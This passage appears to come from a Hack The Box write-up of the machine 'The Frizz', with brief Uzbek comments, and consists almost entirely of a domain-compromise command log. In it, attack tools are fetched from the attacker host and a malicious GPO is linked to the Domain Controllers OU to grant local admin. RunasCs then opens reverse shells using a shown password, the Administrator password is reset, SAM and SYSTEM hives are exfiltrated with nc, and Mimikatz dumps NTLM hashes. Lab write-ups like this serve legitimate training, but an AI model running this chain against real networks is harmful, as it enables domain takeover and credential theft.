PS C:\Temp> Invoke-WebRequest -Uri "http://10.10.14.109:8000/SharpGPOAb
use.exe" -OutFile "C:\Temp\SharpGPOAbuse.exe"
PS C:\Temp> Invoke-WebRequest -Uri "http://10.10.14.109:8000/RunasCs.ex
e" -OutFile "C:\Temp\RunasCs.exe"
PS C:\Temp> dir

Directory: C:\Temp

Mode LastWriteTime Length Name

---- ------------- ------ ----
-a--- 3/19/2025 5:39 PM 51712 RunasCs.exe
-a--- 3/19/2025 5:39 PM 80896 SharpGPOAbuse.exe

PS C:\Temp> New-GPO -Name evils | New-GPLink -Target "OU=DOMAIN C

ONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes

GpoId : 6895da69-7b67-44a5-8150-f1219952e58a
DisplayName : evils
Enabled : True
Enforced : False
Target : OU=Domain Controllers,DC=frizz,DC=htb
Order :2

PS C:\Temp> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.Sch

oolBus --GPOName evils
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of M.SchoolBus = S-1-5-21-2386970044-1145388522-2932701
813-1106
[+] GUID of "evils" is: {6895DA69-7B67-44A5-8150-F1219952E58A}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{6895DA69-7B67-44A5-

The Frizz 29
 8150-F1219952E58A}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO ref
resh cycle.
[+] Done!
PS C:\Temp> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.

User Policy update has completed successfully.

Endi netcat bilan tinglimiz va RunasCs.exe ishlatamiz

PS C:\Temp> .\RunasCs.exe M.SchoolBus !suBcig@MehTed!R cmd.exe -r 10.1

0.14.109:4444
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-70b5c$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 2396 created in
background.
PS C:\Temp>
=======================================================
㉿
┌──(kali kali)-[~/Downloads]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.109] from (UNKNOWN) [10.10.11.60] 56023
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>
C:\Windows\system32>type c:\users\administrator\Desktop\root.txt
type c:\users\administrator\Desktop\root.txt
a1d4a462107bc2267d2af068b019e369694

C:\Users>type f.frizzle\Desktop\user.txt

The Frizz 30
 type f.frizzle\Desktop\user.txt
4a279e844a63ab3a5f375ba3438da57969e

Administratorga kirib boshqa userlarni hashini olish

C:\Windows\system32>net user Administrator P@ssw0rd123

net user Administrator P@ssw0rd123
The command completed successfully.

PS C:\Temp> .\RunasCs.exe administrator P@ssw0rd123 cmd.exe -r 10.10.14.1

09:5555
======================================
㉿
┌──(kali kali)-[~]
└─$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.109] from (UNKNOWN) [10.10.11.60] 50427
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
frizz\administrator

C:\Windows\system32>

C:\Temp>reg save HKLM\SAM C:\Temp\SAM

reg save HKLM\SAM C:\Temp\SAM
The operation completed successfully.

C:\Temp>reg save HKLM\SYSTEM C:\Temp\SYSTEM

reg save HKLM\SYSTEM C:\Temp\SYSTEM
The operation completed successfully.

C:\Temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is D129-C3DA

The Frizz 31
 Directory of C:\Temp

03/19/2025 06:38 PM <DIR> .

03/19/2025 06:30 PM 1,355,680 mimikatz.exe
03/19/2025 06:24 PM 51,712 RunasCs.exe
03/19/2025 06:37 PM 40,960 SAM
03/19/2025 06:24 PM 80,896 SharpGPOAbuse.exe
03/19/2025 06:38 PM 14,000,128 SYSTEM
5 File(s) 15,529,376 bytes

C:\Temp>nc -w 3 10.10.14.109 4444 < SAM

nc -w 3 10.10.14.109 4444 < SAM

C:\Temp>nc -w 3 10.10.14.109 4444 < SYSTEM

nc -w 3 10.10.14.109 4444 < SYSTEM

㉿
┌──(kali kali)-[~]
└─$ nc -lvnp 4444 > SAM
listening on [any] 4444 ...
connect to [10.10.14.109] from (UNKNOWN) [10.10.11.60] 49580

㉿
┌──(kali kali)-[~]
└─$ nc -lvnp 4444 > SYSTEM
listening on [any] 4444 ...
connect to [10.10.14.109] from (UNKNOWN) [10.10.11.60] 49582

C:\Temp>mimikatz.exe
mimikatz.exe

.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

The Frizz 32
 mimikatz # lsadump::sam /system:C:\Temp\SYSTEM /sam:C:\Temp\SAM
Domain : FRIZZDC
SysKey : 02a7ae01010ecbfb70406e489a435ec7
Local SID : S-1-5-21-3873670720-2504411258-3912888090

SAMKey : 955b8e610ae76fc77ed8f9dc041048be

RID : 000001f4 (500)

User : Administrator
Hash NTLM: c299f8b2acc2da429d3a35953b3854d7

RID : 000001f5 (501)

User : Guest

RID : 000001f7 (503)

User : DefaultAccount

RID : 000001f8 (504)

User : WDAGUtilityAccount

The Frizz 33